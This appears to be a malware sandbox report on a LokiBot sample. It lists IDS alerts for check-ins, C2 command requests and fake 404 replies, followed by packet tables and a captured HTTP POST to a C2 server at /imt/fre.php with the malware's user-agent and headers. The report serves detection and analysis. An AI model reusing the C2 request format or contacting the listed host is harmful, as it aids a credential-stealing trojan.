                  11/25/21-18:22:54.348325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.348325TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.348325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.655710TCP2025483ET TROJAN LokiBot Fake 404 Response8049765194.85.248.167192.168.2.3
                  11/25/21-18:22:55.798213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3194.85.248.167
                  11/25/21-18:22:56.114465TCP2025483ET TROJAN LokiBot Fake 404 Response8049766194.85.248.167192.168.2.3
                  11/25/21-18:22:58.836459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.3194.85.248.167
                  11/25/21-18:22:59.163004TCP2025483ET TROJAN LokiBot Fake 404 Response8049769194.85.248.167192.168.2.3
                  11/25/21-18:23:01.423938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.3194.85.248.167
                  11/25/21-18:23:02.684122TCP2025483ET TROJAN LokiBot Fake 404 Response8049770194.85.248.167192.168.2.3
                  11/25/21-18:23:07.452292TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.544955TCP2025483ET TROJAN LokiBot Fake 404 Response8049785194.85.248.167192.168.2.3
                  11/25/21-18:23:09.396769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.919206TCP2025483ET TROJAN LokiBot Fake 404 Response8049809194.85.248.167192.168.2.3
                  11/25/21-18:23:13.834390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.931422TCP2025483ET TROJAN LokiBot Fake 404 Response8049813194.85.248.167192.168.2.3
                  11/25/21-18:23:19.463239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.3194.85.248.167
                  11/25/21-18:23:20.086960TCP2025483ET TROJAN LokiBot Fake 404 Response8049814194.85.248.167192.168.2.3
                  11/25/21-18:23:23.655365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3194.85.248.167
                  11/25/21-18:23:24.492060TCP2025483ET TROJAN LokiBot Fake 404 Response8049817194.85.248.167192.168.2.3
                  11/25/21-18:23:26.318058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.435048TCP2025483ET TROJAN LokiBot Fake 404 Response8049818194.85.248.167192.168.2.3
                  11/25/21-18:23:27.828008TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.923948TCP2025483ET TROJAN LokiBot Fake 404 Response8049819194.85.248.167192.168.2.3
                  11/25/21-18:23:29.237002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.329433TCP2025483ET TROJAN LokiBot Fake 404 Response8049820194.85.248.167192.168.2.3
                  11/25/21-18:23:30.587831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.896799TCP2025483ET TROJAN LokiBot Fake 404 Response8049821194.85.248.167192.168.2.3
                  11/25/21-18:23:32.864603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.960193TCP2025483ET TROJAN LokiBot Fake 404 Response8049822194.85.248.167192.168.2.3
                  11/25/21-18:23:35.140691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.375536TCP2025483ET TROJAN LokiBot Fake 404 Response8049823194.85.248.167192.168.2.3
                  11/25/21-18:23:36.493113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.3194.85.248.167
                  11/25/21-18:23:37.014189TCP2025483ET TROJAN LokiBot Fake 404 Response8049825194.85.248.167192.168.2.3
                  11/25/21-18:23:40.295826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.387692TCP2025483ET TROJAN LokiBot Fake 404 Response8049827194.85.248.167192.168.2.3
                  11/25/21-18:23:41.914761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.3194.85.248.167
                  11/25/21-18:23:42.233618TCP2025483ET TROJAN LokiBot Fake 404 Response8049829194.85.248.167192.168.2.3
                  11/25/21-18:23:44.612994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.707285TCP2025483ET TROJAN LokiBot Fake 404 Response8049833194.85.248.167192.168.2.3
                  11/25/21-18:23:45.744734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.839464TCP2025483ET TROJAN LokiBot Fake 404 Response8049845194.85.248.167192.168.2.3
                  11/25/21-18:23:46.879979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.3194.85.248.167
                  11/25/21-18:23:47.403833TCP2025483ET TROJAN LokiBot Fake 404 Response8049851194.85.248.167192.168.2.3
                  11/25/21-18:23:48.864530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.959683TCP2025483ET TROJAN LokiBot Fake 404 Response8049855194.85.248.167192.168.2.3
                  11/25/21-18:23:51.197910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3194.85.248.167
                  11/25/21-18:23:53.573219TCP2025483ET TROJAN LokiBot Fake 404 Response8049856194.85.248.167192.168.2.3
                  11/25/21-18:23:55.025972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.525480TCP2025483ET TROJAN LokiBot Fake 404 Response8049857194.85.248.167192.168.2.3
                  11/25/21-18:23:56.479058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.3194.85.248.167
                  11/25/21-18:23:57.486293TCP2025483ET TROJAN LokiBot Fake 404 Response8049858194.85.248.167192.168.2.3
                  11/25/21-18:23:59.056904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.210264TCP2025483ET TROJAN LokiBot Fake 404 Response8049859194.85.248.167192.168.2.3
                  11/25/21-18:24:00.760570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.858030TCP2025483ET TROJAN LokiBot Fake 404 Response8049860194.85.248.167192.168.2.3
                  11/25/21-18:24:02.488226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.585421TCP2025483ET TROJAN LokiBot Fake 404 Response8049861194.85.248.167192.168.2.3
                  11/25/21-18:24:04.158304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.667956TCP2025483ET TROJAN LokiBot Fake 404 Response8049862194.85.248.167192.168.2.3
                  11/25/21-18:24:06.231426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.343087TCP2025483ET TROJAN LokiBot Fake 404 Response8049863194.85.248.167192.168.2.3
                  11/25/21-18:24:07.945362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3194.85.248.167
                  11/25/21-18:24:08.055054TCP2025483ET TROJAN LokiBot Fake 404 Response8049865194.85.248.167192.168.2.3
                  11/25/21-18:24:09.150416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.249568TCP2025483ET TROJAN LokiBot Fake 404 Response8049866194.85.248.167192.168.2.3
                  11/25/21-18:24:11.256726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.963359TCP2025483ET TROJAN LokiBot Fake 404 Response8049867194.85.248.167192.168.2.3

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:22:15.623271942 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.654028893 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.654150009 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.658540010 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.688158989 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.688220978 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.717979908 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.769964933 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.770123959 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.868200064 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.868268013 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.612982035 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:17.613193035 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.613467932 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.640830040 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.805661917 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.833978891 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.834136009 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.837898016 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.866069078 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.866183996 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.894547939 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.563548088 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.563735962 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:20.564021111 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.564080000 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:20.603979111 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.618688107 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.646271944 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.646491051 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.772417068 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.799990892 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.800093889 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.827558994 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949353933 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949449062 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949625015 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.949754953 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.977195024 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.348896980 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.376507998 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.376617908 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.379975080 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.408114910 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.408200026 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.435724020 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474404097 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474419117 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474483013 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.474617958 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.778615952 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.806654930 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.256870031 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.288836956 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.289027929 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.292669058 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.557539940 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.585602999 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.843662024 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.843704939 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.844096899 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.846860886 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.874469995 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.837857008 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.865418911 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.865601063 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.868772030 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.902103901 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.902323961 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.929934978 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965337992 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965383053 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965493917 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.965606928 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.993765116 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.223747015 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.251619101 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.251868010 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.257549047 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.287244081 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.287763119 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.315622091 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.383367062 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.383407116 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.383631945 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.383725882 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.411499977 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:29.577682972 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:29.605204105 CET8049751194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:29.605415106 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:29.608133078 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:29.635970116 CET8049751194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:29.636060953 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:29.663456917 CET8049751194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:30.439112902 CET8049751194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:30.439265966 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:30.439536095 CET8049751194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:30.439580917 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:30.745325089 CET4975180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:30.772891998 CET8049751194.85.248.167192.168.2.3

                  HTTP Request Dependency Graph

                  • 194.85.248.167

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349744194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:15.658540010 CET1080OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:17.612982035 CET1081INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:15 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
